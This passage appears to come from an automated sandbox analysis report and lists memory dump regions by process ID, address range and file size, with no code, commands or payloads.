                                                            • memory/2724-170-0x0000000007DC0000-0x0000000007DC8000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/2724-50-0x0000000008120000-0x000000000879A000-memory.dmp

                                                              Filesize

                                                              6.5MB

                                                            • memory/2724-15-0x0000000006770000-0x000000000678E000-memory.dmp

                                                              Filesize

                                                              120KB

                                                            • memory/2724-70-0x0000000007AF0000-0x0000000007AFA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/2724-14-0x0000000006150000-0x00000000064A4000-memory.dmp

                                                              Filesize

                                                              3.3MB

                                                            • memory/2724-162-0x0000000007CF0000-0x0000000007D04000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/2724-71-0x0000000007D10000-0x0000000007DA6000-memory.dmp

                                                              Filesize

                                                              600KB

                                                            • memory/2724-82-0x0000000007C80000-0x0000000007C91000-memory.dmp

                                                              Filesize

                                                              68KB

                                                            • memory/2724-158-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/2724-4-0x00000000060E0000-0x0000000006146000-memory.dmp

                                                              Filesize

                                                              408KB

                                                            • memory/2724-2-0x0000000005890000-0x00000000058B2000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/4500-290-0x0000026D79970000-0x0000026D79978000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/4772-36-0x0000000000B30000-0x0000000000B42000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/5052-156-0x00007FFD631D0000-0x00007FFD63545000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/5052-153-0x00007FFD7B580000-0x00007FFD7B58D000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/5052-143-0x00007FFD76C60000-0x00007FFD76C8D000-memory.dmp

                                                              Filesize

                                                              180KB

                                                            • memory/5052-144-0x00007FFD7A5D0000-0x00007FFD7A5E9000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/5052-351-0x00007FFD76C40000-0x00007FFD76C5F000-memory.dmp

                                                              Filesize

                                                              124KB

                                                            • memory/5052-165-0x00007FFD638D0000-0x00007FFD63D3E000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                            • memory/5052-166-0x00007FFD62EC0000-0x00007FFD62FD8000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/5052-447-0x00007FFD7B830000-0x00007FFD7B83F000-memory.dmp

                                                              Filesize

                                                              60KB

                                                            • memory/5052-448-0x00007FFD76C40000-0x00007FFD76C5F000-memory.dmp

                                                              Filesize

                                                              124KB

                                                            • memory/5052-157-0x00007FFD63110000-0x00007FFD631C8000-memory.dmp

                                                              Filesize

                                                              736KB

                                                            • memory/5052-360-0x00007FFD63750000-0x00007FFD638C1000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/5052-361-0x00007FFD631D0000-0x00007FFD63545000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/5052-365-0x00007FFD75FA0000-0x00007FFD75FCE000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/5052-364-0x00007FFD768B0000-0x00007FFD768C9000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/5052-376-0x00007FFD63110000-0x00007FFD631C8000-memory.dmp

                                                              Filesize

                                                              736KB

                                                            • memory/5052-387-0x00007FFD75F80000-0x00007FFD75F94000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/5052-389-0x00007FFD7A3D0000-0x00007FFD7A3F4000-memory.dmp

                                                              Filesize

                                                              144KB

                                                            • memory/5052-388-0x00007FFD638D0000-0x00007FFD63D3E000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                            • memory/5052-163-0x00007FFD7B4F0000-0x00007FFD7B4FD000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/5052-152-0x00007FFD768B0000-0x00007FFD768C9000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/5052-160-0x00007FFD75F80000-0x00007FFD75F94000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/5052-181-0x00007FFD7A3D0000-0x00007FFD7A3F4000-memory.dmp

                                                              Filesize

                                                              144KB

                                                            • memory/5052-154-0x00007FFD75FA0000-0x00007FFD75FCE000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/5052-147-0x00007FFD63750000-0x00007FFD638C1000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/5052-145-0x00007FFD76C40000-0x00007FFD76C5F000-memory.dmp

                                                              Filesize

                                                              124KB

                                                            • memory/5052-117-0x00007FFD7A3D0000-0x00007FFD7A3F4000-memory.dmp

                                                              Filesize

                                                              144KB

                                                            • memory/5052-135-0x00007FFD7B830000-0x00007FFD7B83F000-memory.dmp

                                                              Filesize

                                                              60KB

                                                            • memory/5052-112-0x00007FFD638D0000-0x00007FFD63D3E000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                            • memory/5052-431-0x00007FFD638D0000-0x00007FFD63D3E000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                            • memory/5052-446-0x00007FFD7A3D0000-0x00007FFD7A3F4000-memory.dmp

                                                              Filesize

                                                              144KB

                                                            • memory/5052-459-0x00007FFD62EC0000-0x00007FFD62FD8000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/5052-458-0x00007FFD7B4F0000-0x00007FFD7B4FD000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/5052-457-0x00007FFD75F80000-0x00007FFD75F94000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/5052-456-0x00007FFD631D0000-0x00007FFD63545000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/5052-455-0x00007FFD63110000-0x00007FFD631C8000-memory.dmp

                                                              Filesize

                                                              736KB

                                                            • memory/5052-454-0x00007FFD75FA0000-0x00007FFD75FCE000-memory.dmp

                                                              Filesize

                                                              184KB

                                                            • memory/5052-453-0x00007FFD7B580000-0x00007FFD7B58D000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/5052-452-0x00007FFD768B0000-0x00007FFD768C9000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/5052-451-0x00007FFD63750000-0x00007FFD638C1000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/5052-450-0x00007FFD76C60000-0x00007FFD76C8D000-memory.dmp

                                                              Filesize

                                                              180KB

                                                            • memory/5052-449-0x00007FFD7A5D0000-0x00007FFD7A5E9000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/5096-167-0x0000000008A50000-0x0000000008FF4000-memory.dmp

                                                              Filesize

                                                              5.6MB

                                                            • memory/5096-168-0x00000000079D0000-0x0000000007A62000-memory.dmp

                                                              Filesize

                                                              584KB